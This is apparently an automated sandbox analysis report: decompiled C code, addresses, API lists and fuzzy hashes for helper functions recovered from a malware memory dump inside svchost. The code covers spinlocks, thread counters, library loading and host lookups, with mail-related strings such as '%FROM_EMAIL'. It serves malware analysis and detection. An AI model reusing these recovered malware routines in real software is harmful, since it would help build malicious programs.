                                                                                                                                  0x02514e9c
                                                                                                                                  0x02514ea6
                                                                                                                                  0x02514ea8
                                                                                                                                  0x02514ec0
                                                                                                                                  0x02514ec3
                                                                                                                                  0x02514ec7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02514eaf
                                                                                                                                  0x02514eb6
                                                                                                                                  0x02514eba
                                                                                                                                  0x00000000
                                                                                                                                  0x02514eba
                                                                                                                                  0x00000000
                                                                                                                                  0x02514eb6
                                                                                                                                  0x02514ecd

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02514E9E
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02514EAD
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000001), ref: 02514EBA
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02514EC3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 4a6cdea17a245af7f9e9b4cbc324c518d0e7de0a11d48639b8286244444d7035
                                                                                                                                  • Instruction ID: 8dde27b513d2c52ec34869659f3fdfde7032c749e874d35ee9940b55a54ff93b
                                                                                                                                  • Opcode Fuzzy Hash: 4a6cdea17a245af7f9e9b4cbc324c518d0e7de0a11d48639b8286244444d7035
                                                                                                                                  • Instruction Fuzzy Hash: B3E0263264221417F6202AB9AC80F676649AB57360F020E31E708C21C0C656941A41BA
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02514BD1 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02514BD1(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 0xc;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t2;
			}







                                                                                                                                  0x02514bdb
                                                                                                                                  0x02514be5
                                                                                                                                  0x02514be7
                                                                                                                                  0x02514bff
                                                                                                                                  0x02514c02
                                                                                                                                  0x02514c06
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02514bee
                                                                                                                                  0x02514bf5
                                                                                                                                  0x02514bf9
                                                                                                                                  0x00000000
                                                                                                                                  0x02514bf9
                                                                                                                                  0x00000000
                                                                                                                                  0x02514bf5
                                                                                                                                  0x02514c0c

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02514BDD
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02514BEC
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,02A181BC,025150F2), ref: 02514BF9
                                                                                                                                  • InterlockedExchange.KERNEL32(02A181B0,00000001), ref: 02514C02
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: c95d5c37245f52885686f14bd93c048b5c42b84d6906a85d9ec86b7770de28ae
                                                                                                                                  • Instruction ID: eb2505f076ebb7db0b3f095d7853b2ffc3caf7f1e0e41c3a49fa7332828d356c
                                                                                                                                  • Opcode Fuzzy Hash: c95d5c37245f52885686f14bd93c048b5c42b84d6906a85d9ec86b7770de28ae
                                                                                                                                  • Instruction Fuzzy Hash: 57E0CD3768221457FB202AB55C80F76775CFB56761F470872F708D31C0C556945945BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 025130FA Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E025130FA(LONG* _a4) {
				long _t3;
				long _t5;

				_t5 = GetTickCount();
				while(1) {
					_t3 = InterlockedExchange(_a4, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t5;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                                                                  0x0251310b
                                                                                                                                  0x02513122
                                                                                                                                  0x02513128
                                                                                                                                  0x0251312c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02513111
                                                                                                                                  0x02513118
                                                                                                                                  0x0251311c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251311c
                                                                                                                                  0x00000000
                                                                                                                                  0x02513118
                                                                                                                                  0x02513131

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02513103
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251310F
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 0251311C
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02513128
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 5cba0e2fac9cbe12f5d292aaeaaebcebeb83cc2bbb18f1aa1b09aba83ba0ddc1
                                                                                                                                  • Instruction ID: 35a2165f31465510cd8aea6061c09af08579fef2085e08deb412025325c82ed9
                                                                                                                                  • Opcode Fuzzy Hash: 5cba0e2fac9cbe12f5d292aaeaaebcebeb83cc2bbb18f1aa1b09aba83ba0ddc1
                                                                                                                                  • Instruction Fuzzy Hash: DAE0C231682215BBFB102F75AD84BA96A5AEF95761F1208B1F205D20D0C650481C9979
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 025138F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E025138F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t29;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t50;

				if(_a8 <= 0) {
					L14:
					return _t29;
				}
				_t29 = E025130FA(0x2522c00);
				_v8 = 0;
				if(_a8 <= 0) {
					L13:
					 *0x2522c00 =  *0x2522c00 & 0x00000000;
					goto L14;
				} else {
					do {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
						_t45 =  *((intOrPtr*)(_t50 - 0x24));
						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
							_t10 = _t50 - 0x1c;
							 *_t10 =  *(_t50 - 0x1c) - 1;
							if( *_t10 < 0) {
								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
							}
							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
						}
						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
							_t43 = 2;
							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
							_t34 =  *((intOrPtr*)(_t45 + 0x10));
							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
								 *((intOrPtr*)(_t45 + 8)) = _t43;
								if( *0x2522bfc == 0) {
									E02516509(_t34);
									 *0x2522bfc = 1;
								}
							}
						}
						_v8 = _v8 + 1;
						_t29 = _v8;
					} while (_t29 < _a8);
					goto L13;
				}
			}








                                                                                                                                  0x025138fa
                                                                                                                                  0x02513989
                                                                                                                                  0x0251398b
                                                                                                                                  0x0251398b
                                                                                                                                  0x02513905
                                                                                                                                  0x0251390b
                                                                                                                                  0x02513911
                                                                                                                                  0x02513982
                                                                                                                                  0x02513982
                                                                                                                                  0x00000000
                                                                                                                                  0x02513913
                                                                                                                                  0x0251391b
                                                                                                                                  0x02513924
                                                                                                                                  0x02513926
                                                                                                                                  0x0251392e
                                                                                                                                  0x02513930
                                                                                                                                  0x02513930
                                                                                                                                  0x02513933
                                                                                                                                  0x02513935
                                                                                                                                  0x02513935
                                                                                                                                  0x0251393b
                                                                                                                                  0x0251393b
                                                                                                                                  0x0251393e
                                                                                                                                  0x02513947
                                                                                                                                  0x0251394b
                                                                                                                                  0x0251394c
                                                                                                                                  0x0251394f
                                                                                                                                  0x02513952
                                                                                                                                  0x02513958
                                                                                                                                  0x0251395a
                                                                                                                                  0x02513964
                                                                                                                                  0x02513966
                                                                                                                                  0x0251396b
                                                                                                                                  0x0251396b
                                                                                                                                  0x02513964
                                                                                                                                  0x02513958
                                                                                                                                  0x02513975
                                                                                                                                  0x02513978
                                                                                                                                  0x0251397b
                                                                                                                                  0x00000000
                                                                                                                                  0x02513981

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 025130FA: GetTickCount.KERNEL32 ref: 02513103
                                                                                                                                    • Part of subcall function 025130FA: InterlockedExchange.KERNEL32(?,00000001), ref: 02513128
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02513929
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02513939
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                                                                  • String ID: %FROM_EMAIL
                                                                                                                                  • API String ID: 3716169038-2903620461
                                                                                                                                  • Opcode ID: ae768f14b95e47104f603149d96e9f7dfb816e5af2c38a959e95a95f97d1e9ff
                                                                                                                                  • Instruction ID: 952c5024581ba3e67626992b68eca2b601ac4d59484ed777a7f1b4650e83475a
                                                                                                                                  • Opcode Fuzzy Hash: ae768f14b95e47104f603149d96e9f7dfb816e5af2c38a959e95a95f97d1e9ff
                                                                                                                                  • Instruction Fuzzy Hash: 49116A75900209FFE720DF29D480A68F7F5FB45726F11899EE84497280C770AA88DFA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251AB81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
				void* _t15;
				long _t17;
				signed int _t29;
				long* _t31;

				_t29 = 0;
				if(_a8 > 0) {
					do {
						_t31 = _a4 + _t29 * 4;
						_t17 =  *_t31;
						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
							 *((char*)(_t17 + 0x11)) = _a20;
							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
							 *((char*)( *_t31 + 0x4f)) = 0;
							 *((char*)( *_t31 + 0x10)) = _a12;
							if( *((char*)( *_t31 + 0x10)) != 2) {
								_t17 = InterlockedIncrement(0x2523640);
							} else {
								_t17 = InterlockedIncrement(0x252363c);
							}
						}
						_t29 = _t29 + 1;
					} while (_t29 < _a8);
					return _t17;
				}
				return _t15;
			}







                                                                                                                                  0x0251ab85
                                                                                                                                  0x0251ab8a
                                                                                                                                  0x0251ab94
                                                                                                                                  0x0251ab97
                                                                                                                                  0x0251ab9a
                                                                                                                                  0x0251aba0
                                                                                                                                  0x0251abab
                                                                                                                                  0x0251abb9
                                                                                                                                  0x0251abc4
                                                                                                                                  0x0251abca
                                                                                                                                  0x0251abd3
                                                                                                                                  0x0251abe1
                                                                                                                                  0x0251abd5
                                                                                                                                  0x0251abe1
                                                                                                                                  0x0251abe1
                                                                                                                                  0x0251abe1
                                                                                                                                  0x0251abe3
                                                                                                                                  0x0251abe4
                                                                                                                                  0x00000000
                                                                                                                                  0x0251abea
                                                                                                                                  0x0251abed

                                                                                                                                  APIs
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0251BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0251ABB9
                                                                                                                                  • InterlockedIncrement.KERNEL32(02523640), ref: 0251ABE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IncrementInterlockedlstrcpyn
                                                                                                                                  • String ID: %FROM_EMAIL
                                                                                                                                  • API String ID: 224340156-2903620461
                                                                                                                                  • Opcode ID: 856475977378f3a731c25544fea71b7c8ff2dd80692dbd03529f1c2d5c9ec17f
                                                                                                                                  • Instruction ID: 4364df257eb5da52167ae29ecf5cb7e3db1635669fd51f5867f96c9727c99d94
                                                                                                                                  • Opcode Fuzzy Hash: 856475977378f3a731c25544fea71b7c8ff2dd80692dbd03529f1c2d5c9ec17f
                                                                                                                                  • Instruction Fuzzy Hash: 32019E315093D4AFFB22CE18D881F967FAABF56314F154884E58047283C374E588CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 025126B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 025126C3
                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 025126E4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbyaddrinet_ntoa
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 2112563974-1857712256
                                                                                                                                  • Opcode ID: 27ed871bd53d86a7787df88fd7ab0809897f1645223f074dac229d52928ec855
                                                                                                                                  • Instruction ID: 3bc40cefb362be4167e18abe560bf72266667948eb04bb190135f4a7192067b6
                                                                                                                                  • Opcode Fuzzy Hash: 27ed871bd53d86a7787df88fd7ab0809897f1645223f074dac229d52928ec855
                                                                                                                                  • Instruction Fuzzy Hash: 84F082321482196BFB04AFA0EC05AAA3B9DEB05250F104426FD08CA0D0EF71D990979C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251EAE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251EAE4(CHAR* _a4) {
				struct HINSTANCE__* _t2;

				_t2 =  *0x25236f4; // 0x77460000
				if(_t2 != 0) {
					L3:
					return GetProcAddress(_t2, _a4);
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x25236f4 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}




                                                                                                                                  0x0251eae4
                                                                                                                                  0x0251eaeb
                                                                                                                                  0x0251eb02
                                                                                                                                  0x0251eb0d
                                                                                                                                  0x0251eaed
                                                                                                                                  0x0251eaf2
                                                                                                                                  0x0251eaf8
                                                                                                                                  0x0251eaff
                                                                                                                                  0x00000000
                                                                                                                                  0x0251eb01
                                                                                                                                  0x0251eb01
                                                                                                                                  0x0251eb01
                                                                                                                                  0x0251eaff

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,0251EB54,_alldiv,0251F0B7,80000001,00000000,00989680,00000000,?,?,?,0251E342,00000000,745CF210,80000001,00000000), ref: 0251EAF2
                                                                                                                                  • GetProcAddress.KERNEL32(77460000,00000000), ref: 0251EB07
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: ntdll.dll
                                                                                                                                  • API String ID: 2574300362-2227199552
                                                                                                                                  • Opcode ID: 88978e4f3d93249818abc7ea168c924d362120247599a29c3aa0da0b6acbfaba
                                                                                                                                  • Instruction ID: a0f1da34e1c14b82909f12caf6f4817e4bc5713a5575b17c0e16226b437e3958
                                                                                                                                  • Opcode Fuzzy Hash: 88978e4f3d93249818abc7ea168c924d362120247599a29c3aa0da0b6acbfaba
                                                                                                                                  • Instruction Fuzzy Hash: A4D0C734F4130267AF364F64990BA157AEC7751B417414855A407D15C1D734D41CE60C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02512F22 Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02512F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v12;
				char _v368;
				void* _t64;
				signed short* _t66;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t76;
				intOrPtr* _t82;
				short _t86;
				intOrPtr* _t87;
				signed int _t94;
				intOrPtr _t96;
				signed int _t99;
				short* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = _a12;
				_t94 = 0;
				 *_t116 = 0;
				_t117 = E02512D21(_a4);
				if(_t117 != 0) {
					if( *_t117 != 0) {
						_v12 = _t117;
						_a12 = _a8;
						while(_t94 < 5) {
							_t9 = _t117 + 8; // 0x8
							_t104 = _t9;
							_t82 = _t9;
							_t10 = _t82 + 1; // 0x9
							_v8 = _t10;
							do {
								_t114 =  *_t82;
								_t82 = _t82 + 1;
							} while (_t114 != 0);
							E0251EE08(_a12, _t104, _t82 - _v8 + 1);
							_t86 =  *((intOrPtr*)(_t117 + 4));
							_a12 = _a12 + 0x100;
							_t122 = _t122 + 0xc;
							 *_t116 =  *_t116 + 1;
							_t117 =  *_t117;
							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
							_t94 = _t94 + 1;
							if(_t117 != 0) {
								continue;
							}
							break;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						_v8 = _v8 & 0x00000000;
						if( *_t116 == 1) {
							L24:
							return 1;
						}
						_t64 =  *_t116 - 1;
						_a12 = _a8;
						do {
							_t118 = _v8;
							_t99 = _t118;
							if(_t118 >=  *_t116 - 1) {
								L17:
								_t66 = _t121 + _v8 * 2 - 0x6c;
								_t100 = _t121 + _t118 * 2 - 0x6c;
								 *_t66 =  *_t100;
								_t67 = _a12;
								 *_t100 =  *_t66 & 0x0000ffff;
								_t101 = _t67 + 1;
								do {
									_t109 =  *_t67;
									_t67 = _t67 + 1;
								} while (_t109 != 0);
								E0251EE08( &_v368, _a12, _t67 - _t101 + 1);
								_t123 = _t122 + 0xc;
								_t120 = (_t118 << 8) + _a8;
								_t72 = (_t118 << 8) + _a8;
								_t102 = _t72 + 1;
								do {
									_t110 =  *_t72;
									_t72 = _t72 + 1;
								} while (_t110 != 0);
								E0251EE08(_a12, _t120, _t72 - _t102 + 1);
								_t76 =  &_v368;
								_t124 = _t123 + 0xc;
								_t103 = _t76 + 1;
								do {
									_t111 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t111 != 0);
								goto L23;
							} else {
								goto L14;
							}
							do {
								L14:
								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
									_t32 = _t99 + 1; // 0x1
									_t118 = _t32;
								}
								_t99 = _t99 + 1;
							} while (_t99 < _t64);
							goto L17;
							L23:
							E0251EE08(_t120,  &_v368, _t76 - _t103 + 1);
							_a12 = _a12 + 0x100;
							_t122 = _t124 + 0xc;
							_v8 = _v8 + 1;
							_t64 =  *_t116 - 1;
						} while (_v8 < _t64);
						goto L24;
					}
					_t3 = _t117 + 8; // 0x8
					_t105 = _t3;
					_t87 = _t3;
					_t4 = _t87 + 1; // 0x9
					_t115 = _t4;
					do {
						_t96 =  *_t87;
						_t87 = _t87 + 1;
					} while (_t96 != 0);
					E0251EE08(_a8, _t105, _t87 - _t115 + 1);
					 *_t116 =  *_t116 + 1;
					HeapFree(GetProcessHeap(), 0, _t117);
					goto L24;
				}
				return 0;
			}

































                                                                                                                                  0x02512f2e
                                                                                                                                  0x02512f34
                                                                                                                                  0x02512f36
                                                                                                                                  0x02512f3d
                                                                                                                                  0x02512f42
                                                                                                                                  0x02512f4d
                                                                                                                                  0x02512f88
                                                                                                                                  0x02512f8b
                                                                                                                                  0x02512f8e
                                                                                                                                  0x02512f93
                                                                                                                                  0x02512f93
                                                                                                                                  0x02512f96
                                                                                                                                  0x02512f98
                                                                                                                                  0x02512f9b
                                                                                                                                  0x02512f9e
                                                                                                                                  0x02512f9e
                                                                                                                                  0x02512fa0
                                                                                                                                  0x02512fa1
                                                                                                                                  0x02512fae
                                                                                                                                  0x02512fb3
                                                                                                                                  0x02512fb7
                                                                                                                                  0x02512fbe
                                                                                                                                  0x02512fc1
                                                                                                                                  0x02512fc3
                                                                                                                                  0x02512fc5
                                                                                                                                  0x02512fca
                                                                                                                                  0x02512fcd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512fcd
                                                                                                                                  0x02512fdb
                                                                                                                                  0x02512fe3
                                                                                                                                  0x02512fe8
                                                                                                                                  0x025130ad
                                                                                                                                  0x00000000
                                                                                                                                  0x025130af
                                                                                                                                  0x02512ff3
                                                                                                                                  0x02512ff4
                                                                                                                                  0x02512ff7
                                                                                                                                  0x02512ff9
                                                                                                                                  0x02512ffd
                                                                                                                                  0x02513001
                                                                                                                                  0x02513017
                                                                                                                                  0x0251301a
                                                                                                                                  0x02513021
                                                                                                                                  0x02513028
                                                                                                                                  0x0251302b
                                                                                                                                  0x0251302e
                                                                                                                                  0x02513031
                                                                                                                                  0x02513034
                                                                                                                                  0x02513034
                                                                                                                                  0x02513036
                                                                                                                                  0x02513037
                                                                                                                                  0x02513049
                                                                                                                                  0x02513051
                                                                                                                                  0x02513054
                                                                                                                                  0x02513057
                                                                                                                                  0x02513059
                                                                                                                                  0x0251305c
                                                                                                                                  0x0251305c
                                                                                                                                  0x0251305e
                                                                                                                                  0x0251305f
                                                                                                                                  0x0251306b
                                                                                                                                  0x02513070
                                                                                                                                  0x02513076
                                                                                                                                  0x02513079
                                                                                                                                  0x0251307c
                                                                                                                                  0x0251307c
                                                                                                                                  0x0251307e
                                                                                                                                  0x0251307f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02513003
                                                                                                                                  0x02513003
                                                                                                                                  0x0251300d
                                                                                                                                  0x0251300f
                                                                                                                                  0x0251300f
                                                                                                                                  0x0251300f
                                                                                                                                  0x02513012
                                                                                                                                  0x02513013
                                                                                                                                  0x00000000
                                                                                                                                  0x02513083
                                                                                                                                  0x0251308f
                                                                                                                                  0x02513094
                                                                                                                                  0x0251309d
                                                                                                                                  0x025130a0
                                                                                                                                  0x025130a3
                                                                                                                                  0x025130a4
                                                                                                                                  0x00000000
                                                                                                                                  0x02512ff7
                                                                                                                                  0x02512f4f
                                                                                                                                  0x02512f4f
                                                                                                                                  0x02512f52
                                                                                                                                  0x02512f54
                                                                                                                                  0x02512f54
                                                                                                                                  0x02512f57
                                                                                                                                  0x02512f57
                                                                                                                                  0x02512f59
                                                                                                                                  0x02512f5a
                                                                                                                                  0x02512f66
                                                                                                                                  0x02512f6e
                                                                                                                                  0x02512f7a
                                                                                                                                  0x00000000
                                                                                                                                  0x02512f7a
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 02512D21: GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,02512F01,?,025120FF,02522000), ref: 02512D3A
                                                                                                                                    • Part of subcall function 02512D21: LoadLibraryA.KERNEL32(?), ref: 02512D4A
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02512F73
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 02512F7A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1017166417-0
                                                                                                                                  • Opcode ID: 13feb46b08af8723980838575efdc484aeb2c4e330a15d2132e61f0ca288d69b
                                                                                                                                  • Instruction ID: f1b5a7771c3130fbee38a81b06a7005b0e7ac97ba40986e00f3635dbbdd88e70
                                                                                                                                  • Opcode Fuzzy Hash: 13feb46b08af8723980838575efdc484aeb2c4e330a15d2132e61f0ca288d69b
                                                                                                                                  • Instruction Fuzzy Hash: 3F51C27190021AAFEF01DF64D888AF9BBB5FF05304F1045A9EC96C7210E732DA19CB84
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%